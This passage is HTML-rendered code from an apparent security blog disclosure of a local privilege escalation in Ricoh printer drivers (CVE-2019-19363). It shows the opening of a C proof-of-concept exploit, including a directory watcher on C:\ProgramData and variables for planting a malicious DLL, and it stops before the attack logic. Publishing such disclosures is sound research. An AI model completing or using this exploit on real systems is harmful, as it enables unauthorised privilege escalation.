&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-12"&gt;&lt;code data-line-number=" 12"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-12" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-12"&gt;&lt;/a&gt;&lt;span class="cm"&gt;This proof of concept code is based on the ReadDirectoryChangesW API call to&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-13"&gt;&lt;code data-line-number=" 13"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-13" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-13"&gt;&lt;/a&gt;&lt;span class="cm"&gt;get notified about changes on files and directories and reuses parts from the example from&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-14"&gt;&lt;code data-line-number=" 14"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-14" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-14"&gt;&lt;/a&gt;&lt;span class="cm"&gt;https://www.experts-exchange.com/questions/22507220/ReadDirectoryChangesW-FWATCH-MSDN-sample-not-working.html&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-15"&gt;&lt;code data-line-number=" 15"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-15" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-15"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-16"&gt;&lt;code data-line-number=" 16"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-16" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-16"&gt;&lt;/a&gt;&lt;span class="cm"&gt;*/&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-17"&gt;&lt;code data-line-number=" 17"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-17" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-17"&gt;&lt;/a&gt;&lt;span class="cp"&gt;#include&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="cpf"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-18"&gt;&lt;code data-line-number=" 18"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-18" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-18"&gt;&lt;/a&gt;&lt;span class="cp"&gt;#include&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="cpf"&gt;&amp;lt;stdlib.h&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-19"&gt;&lt;code data-line-number=" 19"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-19" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-19"&gt;&lt;/a&gt;&lt;span class="cp"&gt;#include&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="cpf"&gt;&amp;lt;conio.h&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-20"&gt;&lt;code data-line-number=" 20"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-20" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-20"&gt;&lt;/a&gt;&lt;span class="cp"&gt;#include&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="cpf"&gt;&amp;lt;windows.h&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-21"&gt;&lt;code data-line-number=" 21"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-21" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-21"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-22"&gt;&lt;code data-line-number=" 22"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-22" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-22"&gt;&lt;/a&gt;&lt;span class="cp"&gt;#define MAX_BUFFER  4096&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-23"&gt;&lt;code data-line-number=" 23"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-23" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-23"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-24"&gt;&lt;code data-line-number=" 24"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-24" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-24"&gt;&lt;/a&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;change_counter&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-25"&gt;&lt;code data-line-number=" 25"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-25" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-25"&gt;&lt;/a&gt;&lt;span class="k"&gt;const&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;WCHAR&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;BaseDirName&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="sa"&gt;L&lt;/span&gt;&lt;span class="s"&gt;"C:&lt;/span&gt;&lt;span class="se"&gt;\\&lt;/span&gt;&lt;span class="s"&gt;ProgramData"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-26"&gt;&lt;code data-line-number=" 26"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-26" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-26"&gt;&lt;/a&gt;&lt;span class="k"&gt;const&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;WCHAR&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;TargetDllFullFilePath&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;TargetDLLRelFilePath&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;MaliciousLibraryFile&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;PrinterName&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-27"&gt;&lt;code data-line-number=" 27"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-27" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-27"&gt;&lt;/a&gt;&lt;span class="n"&gt;DWORD&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;dwNotifyFilter&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;FILE_NOTIFY_CHANGE_LAST_WRITE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-28"&gt;&lt;code data-line-number=" 28"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-28" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-28"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;FILE_NOTIFY_CHANGE_SIZE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-29"&gt;&lt;code data-line-number=" 29"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-29" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-29"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;FILE_NOTIFY_CHANGE_LAST_ACCESS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-30"&gt;&lt;code data-line-number=" 30"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-30" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-30"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;FILE_NOTIFY_CHANGE_CREATION&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-31"&gt;&lt;code data-line-number=" 31"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-31" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-31"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-32"&gt;&lt;code data-line-number=" 32"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-32" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-32"&gt;&lt;/a&gt;&lt;span class="k"&gt;typedef&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nc"&gt;_DIRECTORY_INFO&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-33"&gt;&lt;code data-line-number=" 33"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-33" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-33"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;HANDLE&lt;/span&gt;&lt;span class="w"&gt;      &lt;/span&gt;&lt;span class="n"&gt;hDir&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-34"&gt;&lt;code data-line-number=" 34"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-34" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-34"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;TCHAR&lt;/span&gt;&lt;span class="w"&gt;       &lt;/span&gt;&lt;span class="n"&gt;lpszDirName&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;MAX_PATH&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-35"&gt;&lt;code data-line-number=" 35"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-35" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-35"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;CHAR&lt;/span&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;lpBuffer&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;MAX_BUFFER&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-36"&gt;&lt;code data-line-number=" 36"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-36" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-36"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;DWORD&lt;/span&gt;&lt;span class="w"&gt;       &lt;/span&gt;&lt;span class="n"&gt;dwBufLength&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-37"&gt;&lt;code data-line-number=" 37"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-37" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-37"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;OVERLAPPED&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="n"&gt;Overlapped&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-38"&gt;&lt;code data-line-number=" 38"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-38" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-38"&gt;&lt;/a&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;DIRECTORY_INFO&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;PDIRECTORY_INFO&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;LPDIRECTORY_INFO&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-39"&gt;&lt;code data-line-number=" 39"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-39" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-39"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-40"&gt;&lt;code data-line-number=" 40"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-40" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-40"&gt;&lt;/a&gt;&lt;span class="n"&gt;DIRECTORY_INFO&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="n"&gt;DirInfo&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-41"&gt;&lt;code data-line-number=" 41"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-41" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-41"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-42"&gt;&lt;code data-line-number=" 42"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-42" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-42"&gt;&lt;/a&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;WINAPI&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;HandleDirectoryChange&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;DWORD&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;dwCompletionPort&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-43"&gt;&lt;code data-line-number=" 43"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-43" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-43"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;DWORD&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;numBytes&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;cbOffset&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-44"&gt;&lt;code data-line-number=" 44"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-44" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-44"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;LPDIRECTORY_INFO&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;di&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
